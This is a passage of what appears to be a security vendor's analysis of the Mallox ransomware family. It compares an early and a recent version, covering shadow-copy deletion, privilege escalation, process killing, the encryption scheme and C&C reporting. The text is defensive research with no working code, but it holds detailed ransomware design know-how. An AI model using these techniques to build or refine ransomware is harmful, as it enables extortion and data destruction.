mid-May 2021 and is the first discovered executable file belonging to the Mallox ransomware family. It is considered to be the original Mallox version. We have found several samples of this version with various extensions and notes that contain explicit names of the victim organizations. This is one of the few variants of Mallox that support debug logging, which outputs errors and other information about the encryption process to the console. In later versions, the logging functionality was removed or excluded from the release build.</p><p>The ransom note left behind by the original Mallox version looks typical of ransomware: it contains a unique victim identifier, conditions for file decryption, a threat to publish stolen data and the address of the negotiators’ website on the Tor network. To demonstrate their ability to decrypt files, the attackers offer to decrypt several test files that do not contain important data. In this version, the victim organization’s name is explicitly indicated inside the note.</p><div id="attachment_113626" style="width: 1076px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113626" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04.png" alt="Mallox ransom note from the original version" width="1066" height="528" class="size-full wp-image-113626" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04.png 1066w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-1024x507.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-768x380.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-707x350.png 707w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-740x367.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-565x280.png 565w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-800x396.png 800w" sizes="(max-width: 1066px) 100vw, 1066px" /></a><p id="caption-attachment-113626" class="wp-caption-text">Mallox ransom note from the original version</p></div><h4 id="preparing-for-encryption">Preparing for encryption</h4><p>Before encrypting files on the device, the ransomware performs several preparatory steps. First, it checks the language settings of the victim’s operating system. The ransomware immediately terminates if a Russian, Kazakh, Tatar, Belarusian or Ukrainian language identifier is set. Developers of malware typically do this if they hope to avoid prosecution in the countries where the languages are spoken. However, in the <a href="https://www.suspectfile.com/interview-with-mallox-ransomware-group/">interview</a> published in January 2023, a Mallox representative said of these restrictions, “This is due to the developer’s own decision to restrict our operations in those regions. We have no prejudices or preferences in which countries to work”. In the same interview, they claim that the project’s code previously had been used by other ransomware groups and subsequently purchased by the current threat actors. This means that early samples may not be linked to the current owners of Mallox, or that several independent groups may be using these.</p><div id="attachment_113625" style="width: 1243px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113625" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05.png" alt="Mallox main function" width="1233" height="964" class="size-full wp-image-113625" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05.png 1233w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-300x235.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-1024x801.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-768x600.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-448x350.png 448w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-740x579.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-358x280.png 358w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-800x625.png 800w" sizes="(max-width: 1233px) 100vw, 1233px" /></a><p id="caption-attachment-113625" class="wp-caption-text">Mallox main function</p></div><p>If the default language of the operating system is not on the exclusion list, the ransomware process obtains the SeTakeOwnershipPrivilege and SeDebugPrivilege privileges. Next, it removes the keys and values from the registry using the WinAPI function SHDeleteKeyW, apparently to counter system defenses.</p><p>After that, Mallox deletes the shadow copies using the vssadmin.exe utility and completely disables Windows Recovery Environment.</p><h4 id="drives-enumeration-and-exclusions">Drives enumeration and exclusions</h4><p>Mallox encrypts data on all drives from A through Z if these have the following types: DRIVE_REMOTE, DRIVE_REMOVABLE or DRIVE_FIXED. It also supports text files containing paths for encryption via the command-line arguments, such as “-p” and “-d”. If the argument “-d <text_file_path>” is set, the ransomware encrypts only the paths in the text file and does not encrypt the device’s drives recursively. If the argument “-p <text_file_path>” is set, it first encrypts the paths in the text file and only then, the data on local drives. The full list of file path arguments accepted by the original version of Mallox is provided below.</p><table width="715"><tbody><tr><td width="83"><strong>Argument</strong></td><td width="632"><strong>Description</strong></td></tr><tr><td width="83">-d <path></td><td width="632">Expects a path to the text file, encrypts only the paths in the file.</td></tr><tr><td width="83">-p <path></td><td width="632">Expects a path to the text file, first encrypts the paths in the file and only then the drives.</td></tr><tr><td width="83">-l <path></td><td width="632">Expects a path to the text file. It was not noticed that it affected anything.</td></tr></tbody></table><p>To calculate the count of threads that will be used to encrypt files, Mallox uses the WinAPI function GetSystemInfo. It gets the dwNumberOfProcessors value from this function and doubles it. However, the count of threads is limited to 64 and cannot exceed this value.</p><p>Mallox supports allowlist functionality. Lists of extensions, folder names and file names which must not be encrypted are embedded into the ransomware. The folder names include the names of the operating system folders and certain widely known applications. One of the interesting names among the exception files is “debugLog.txt”, which is presumably used for debugging purposes.</p><p>Below is pseudocode for iterating through drives, which is done if the “-d” argument is not set. The code shows that Mallox can use two different directory and file iterating methods: manual NTFS parsing and File Management Functions (WinAPI).</p><div id="attachment_113624" style="width: 1293px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113624" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06.png" alt="Drive search code for encryption" width="1283" height="1352" class="size-full wp-image-113624" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06.png 1283w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-285x300.png 285w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-972x1024.png 972w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-768x809.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-332x350.png 332w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-740x780.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-266x280.png 266w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-800x843.png 800w" sizes="(max-width: 1283px) 100vw, 1283px" /></a><p id="caption-attachment-113624" class="wp-caption-text">Drive search code for encryption</p></div><h4 id="cryptography">Cryptography</h4><p>Mallox implements a convoluted encryption scheme consisting of several cryptographic algorithms.</p><p>Every time Mallox starts, it generates a new user private ECC (elliptic curve) key to be used with ECDH (Elliptic-curve Diffie–Hellman key agreement protocol on the <a href="https://en.wikipedia.org/wiki/Curve25519">Curve25519</a>). To generate this private key, the ransomware uses the pseudorandom number generator <a href="https://en.wikipedia.org/wiki/Mersenne_Twister">Mersenne Twister</a>, the seed for which is generated using the WinAPI function CryptGenRandom. If there are problems with initializing the Cryptographic Service Provider (CryptGenRandom cannot be used), then the seed is generated via a set of functions: QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, and the __rdtsc instruction. The outputs of these functions are multiplied and used as a Mersenne Twister seed.</p><div id="attachment_113623" style="width: 929px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113623" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07.png" alt="Mersenne Twister seed generation" width="919" height="320" class="size-full wp-image-113623" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07.png 919w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-768x267.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-740x258.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-804x280.png 804w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-800x279.png 800w" sizes="(max-width: 919px) 100vw, 919px" /></a><p id="caption-attachment-113623" class="wp-caption-text">Mersenne Twister seed generation</p></div><p>The generated ECC private key is 32 bytes in size. From this private key, the Trojan generates a corresponding user ECC public key. The Trojan then calculates a shared secret using the Elliptic-curve Diffie–Hellman key agreement protocol (ECDH) from the user ECC private key and the attacker’s master ECC public key that is hardcoded in the Trojan’s body. The user ECC private key is not stored anywhere, and the user ECC public key is added to each encrypted file and is necessary for attackers to recalculate the shared secret.</p><p>In the picture below, the first call to the curve25519 function generates a user public key, and the next call generates a shared key, which is then hashed with SHA-256.</p><div id="attachment_113622" style="width: 769px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113622" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08.png" alt="Code for generating a shared secret" width="759" height="388" class="size-full wp-image-113622" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08.png 759w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-300x153.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-685x350.png 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-740x378.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-548x280.png 548w" sizes="(max-width: 759px) 100vw, 759px" /></a><p id="caption-attachment-113622" class="wp-caption-text">Code for generating a shared secret</p></div><p>The first six bytes of the user ECC public key in hexadecimal form are used as the unique identifier of the victim, referred to as “personal identifier” in the note. It is generated uniquely each time the ransomware starts and does not depend on the device, so the identifier will change with each new run.</p><p>Files that are not on the allowlists are encrypted with the ChaCha20 stream cipher. The file key and nonce for ChaCha are encrypted using the symmetric encryption algorithm AES-128 in CTR mode. The key for AES is the first half of the SHA-256 hash of the shared secret obtained previously by using the ECDH protocol.</p><p>Files smaller than or equal to 10240 bytes are encrypted in their entirety. Larger files are encrypted using a stripe method: the file is broken down into 100 pieces, each further divided into 100 chunks. Each of the resulting chunks is encrypted with ChaCha. If the chunk size is less than 4096 bytes, the malware expands its size to 4096 bytes prior to encryption.</p><p>At the end of each encrypted file, Mallox appends a structure we will designate as a “technical buffer”, which stores the information necessary to decrypt the file. The Mallox sample in question has a minimalistic buffer that contains only an encrypted key and nonce for ChaCha, IV for AES, and the user’s ECC public key. The latter is intended to be used by attackers to recover the shared secret and calculate its SHA-256 hash, the first half of which is the encryption key for AES-128 CTR, and, along with IV, is necessary to decrypt the ChaCha key and nonce.</p><p>In the picture below, the ChaCha key and nonce are shown in red, AES CTR in blue, and the public user ECC key in orange.</p><div id="attachment_113621" style="width: 1217px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113621" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09.png" alt="Technical buffer structure saved at the end of the file" width="1207" height="270" class="size-full wp-image-113621" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09.png 1207w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-300x67.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-1024x229.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-768x172.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-740x166.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-800x179.png 800w" sizes="(max-width: 1207px) 100vw, 1207px" /></a><p id="caption-attachment-113621" class="wp-caption-text">“Technical buffer” structure saved at the end of the file</p></div><p>After the encryption is complete, the executable file is deleted via the “del” command.</p><h4 id="communication-with-the-attackers-cc-server">Communication with the attackers’ C&C server</h4><p>Before starting the file encryption process starts, Mallox sends the following information about the infected device to the attacker’s server using an HTTP POST request: the victim’s unique identifier obtained from the public key, the local computer name and the DNS name of the primary domain determined via a call to LsaQueryInformationPolicy with the PolicyDnsDomainInformation parameter.</p><div id="attachment_113620" style="width: 1171px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113620" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10.png" alt="Code to send an HTTP request" width="1161" height="209" class="size-full wp-image-113620" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10.png 1161w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-300x54.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-1024x184.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-768x138.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-740x133.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-800x144.png 800w" sizes="(max-width: 1161px) 100vw, 1161px" /></a><p id="caption-attachment-113620" class="wp-caption-text">Code to send an HTTP request</p></div><p>After the encryption is completed, the ransomware sends a request to the attacker’s server again, with the victim’s ID and information about the encrypted disks.</p><h3 id="recent-mallox-version-e98b3a8d2179e0bd0bebba42735d11b7-v12">Recent Mallox version (e98b3a8d2179e0bd0bebba42735d11b7, v12)</h3><p>This is one of the most recent versions of the Mallox ransomware, found in March 2024. Below, we provide an analysis of this version, but the main purpose of the analysis is to show the difference between the first and the recent versions.</p><p>Compared to the original version of Mallox, one of the significant changes that occurred in later versions concerned the format of the note. The original version explicitly showed the name of the attacked company and device, but later versions more often had a generic note and extensions.</p><div id="attachment_113648" style="width: 1558px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113648" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23.png" alt="Generic ransom note" width="1548" height="657" class="size-full wp-image-113648" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23.png 1548w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-300x127.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-1024x435.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-768x326.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-1536x652.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-825x350.png 825w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-740x314.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-660x280.png 660w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-800x340.png 800w" sizes="(max-width: 1548px) 100vw, 1548px" /></a><p id="caption-attachment-113648" class="wp-caption-text">Generic ransom note</p></div><h4 id="new-arguments">New arguments</h4><table width="705"><tbody><tr><td width="140"><strong>Argument</strong></td><td width="565"><strong>Description</strong></td></tr><tr><td width="140">-path <path></td><td width="565">Does not work in this version. Expects a path to encrypt.</td></tr><tr><td width="140">-queue <integer></td><td width="565">Does not work in this version. Expects an integer value.</td></tr></tbody></table><p>Two new arguments have been added compared to the first version, but none of the new or old arguments work in this variant. Any arguments passed via the command line are in fact checked for existence through the PathFileExistsW function, so the ransomware apparently only accepts file paths as arguments: “mallox.exe <path1> <path2>…. <pathN>”.</p><p>Any arguments that are not paths, including “-p”, “-d”, “-l”, “-path”, “-queue”, result in an error. If the correct paths are passed, the ransomware checks whether it is running with administrative privileges and, if so, it encrypts the files at these paths. If running without administrator permissions, it attempts to elevate its privileges by restarting using ShellExecuteW with <a href="https://learn.microsoft.com/en-us/windows/win32/shell/launch#object-verbs">the verb</a> runas, used to run the application as the administrator.</p><h4 id="preparing-for-encryption">Preparing for encryption</h4><p>Mallox sets the computer’s power scheme to High Performance, obviously in order to increase the performance and speed of the encryption process.</p><div id="attachment_113619" style="width: 1211px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113619" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11.png" alt="Pseudocode to change the power scheme" width="1201" height="328" class="size-full wp-image-113619" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11.png 1201w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-300x82.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-1024x280.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-768x210.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-740x202.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-1025x280.png 1025w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-800x218.png 800w" sizes="(max-width: 1201px) 100vw, 1201px" /></a><p id="caption-attachment-113619" class="wp-caption-text">Pseudocode to change the power scheme</p></div><p>In this version, the Trojan contains a new function for terminating active processes via the TerminateProcess WinAPI function so as to keep them from blocking user files or interfering with the encryption process. The list of terminable process names refers mainly to databases, such as SQL Server, Oracle Database, Pervasive PSQL and MySQL.</p><p>Another new feature concerns services: the Trojan uses the Service Control Manager to disable and stop services using the ChangeServiceConfig and ControlService functions.</p><p>If the user tries to shut down or restart the operating system, Mallox attempts to prevent this. Using the ShutdownBlockReasonCreate function, the ransomware makes the OS display a threatening message about the possibility of file damage unless the user aborts the shutdown or reboot.</p><div id="attachment_113618" style="width: 579px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113618" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12.png" alt="Threat message about file damage" width="569" height="486" class="size-full wp-image-113618" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12.png 569w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12-300x256.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12-410x350.png 410w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12-328x280.png 328w" sizes="(max-width: 569px) 100vw, 569px" /></a><p id="caption-attachment-113618" class="wp-caption-text">Threat message about file damage</p></div><p>Before starting encryption, the Trojan modifies the registry keys of the HKEY_LOCAL_MACHINE hive to disable UAC and hide the Shut Down, Restart and Sign Out buttons.</p><h4 id="cryptography">Cryptography</h4><p>The key generation scheme in the recent version shows significant changes. Presumably, the algorithm was altered by the Mallox developers in an attempt to fix vulnerabilities that allowed decrypting victims’ files without the attackers’ private key in earlier versions of the malware.</p><p>In this latest version, three values embedded in the code are used to generate a shared secret: two public ECC master keys (<strong>master_public_key_1</strong>, <strong>master_public_key_2</strong>) generated on the attacker’s side and a hardcoded 12-byte array. The resulting new scheme is presented below:</p><ul><li>When the Trojan starts, it generates 56 random bytes via CTR_DRBG.</li><li>Twelve bytes in the middle of this 56-byte array are replaced with the hardcoded bytes.</li><li>The resulting 56 bytes are hashed with SHA-256.</li><li>Using ECDH (curve25519) with the result of hashing and <strong>master_public_key_1</strong>, the Trojan generates a <strong>user_private_key</strong>.</li><li>Using ECDH (curve25519) with the <strong>user_secret_key</strong> and the elliptic curve base point, the Trojan generates a <strong>user_public_key</strong>.</li><li>Finally, again, using ECDH (curve25519) with <strong>user_secret_key</strong> and <strong>master_public_key_2</strong>, the Trojan generates a <strong>share_key</strong> shared secret.</li><li>Later, this <strong>share_key </strong>is hashed with SHA-256.</li></ul><p>Below is a simplified diagram of this.</p><div id="attachment_113645" style="width: 831px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113645" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13.png" alt="Key generation scheme in the most recent Mallox version" width="821" height="629" class="size-full wp-image-113645" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13.png 821w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-300x230.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-768x588.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-457x350.png 457w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-740x567.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-365x280.png 365w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-800x613.png 800w" sizes="(max-width: 821px) 100vw, 821px" /></a><p id="caption-attachment-113645" class="wp-caption-text">Key generation scheme in the most recent Mallox version</p></div><p>The file encryption algorithm has also changed: now files are encrypted using AES-256 in GCM mode. File keys are generated with ISAAC PRNG, seeded by the output of the BCryptGenRandom API function combined with Mersenne Twister PRNG. The file keys, as before, are encrypted using AES-128 in CTR mode, and the key for that is still the first half of the SHA-256 hashed <strong>share_key</strong>.</p><p>The technical buffer added at the end of each encrypted file has been expanded. Its beginning and end are indicated by the markers 0x02010201 and 0x04030403, shown in green in the image below. In this version, the ransomware encrypts the first 60% of the file — the total number of encrypted file chunks is shown in pink. Compared to the original version, the chunks have a size of 0x800000 bytes, are located next to each other and are encrypted entirely without further division. Purple stands for the size of the original file, red for the encrypted file key and IV for AES-256-GCM. The blue part is IV for AES-128-CTR, which is used to encrypt file keys. The orange part is the <strong>user_public_key</strong>.</p><div id="attachment_113644" style="width: 1216px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113644" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14.png" alt="Technical buffer structure saved at the end of the file in the latest Mallox version" width="1206" height="264" class="size-full wp-image-113644" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14.png 1206w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-300x66.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-1024x224.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-768x168.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-1200x264.png 1200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-740x162.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-800x175.png 800w" sizes="(max-width: 1206px) 100vw, 1206px" /></a><p id="caption-attachment-113644" class="wp-caption-text">“Technical buffer” structure saved at the end of the file in the latest Mallox version</p></div><h4 id="communication-with-the-attackers-cc-server">Communication with the attackers’ C&C server</h4><p>First, the ransomware gets the external IP address of the encrypted device via a third-party public service. Then it collects information about the user, device, network, disks and files and sends it to the attacker’s C&C server with an HTTP POST request.</p><div id="attachment_113643" style="width: 1498px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113643" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15.png" alt="Data sent to the attacker's C&C" width="1488" height="649" class="size-full wp-image-113643" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15.png 1488w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-300x131.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-1024x447.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-768x335.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-802x350.png 802w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-740x323.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-642x280.png 642w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-800x349.png 800w" sizes="(max-width: 1488px) 100vw, 1488px" /></a><p id="caption-attachment-113643" class="wp-caption-text">Data sent to the attacker’s C&C</p></div><p>If all data is received and processed successfully, the server responds with “Successfully_added”.</p><div id="attachment_113642" style="width: 967px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113642" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16.png" alt="Server response" width="957" height="615" class="size-full wp-image-113642" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16.png 957w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-300x193.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-768x494.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-545x350.png 545w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-740x476.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-436x280.png 436w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-800x514.png 800w" 